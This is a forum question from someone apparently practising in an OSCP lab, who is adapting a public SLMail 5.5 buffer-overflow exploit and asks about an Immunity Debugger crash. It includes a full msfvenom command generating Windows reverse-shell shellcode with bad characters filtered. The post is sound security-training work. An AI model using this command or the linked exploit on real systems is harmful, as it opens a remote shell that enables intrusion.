# Immunity error BB010002

Tags: windows, linux, immunity-debugger, buffer-overflow

I am trying to make [this exploit](https://www.exploit-db.com/exploits/646/) work and having some difficulty.

So I skipped to a 'fixed' version of it from here and the only thing I changed was the shell code:
https://github.com/cokebottle/oscp-tools/blob/master/646-fixed.c

The program terminates showing error code In Immunity Debugger: `BB010002`. Even Google doesn't know what this error means. The last command causing program termination is `C3`, or opcode `RETN`, so it must have something to do with the stack. This op, that is causing the crash is part of my shell code, which I have generated as follows:

```
msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=<PWK VM IP> LPORT=443 -b '\x00\x0a\x0d' -f c
```

The SLMail is a default setup of 5.5 on a 32-bit windows 7 VM. I've been stuck here for over a week, so *please* do help as much as possible.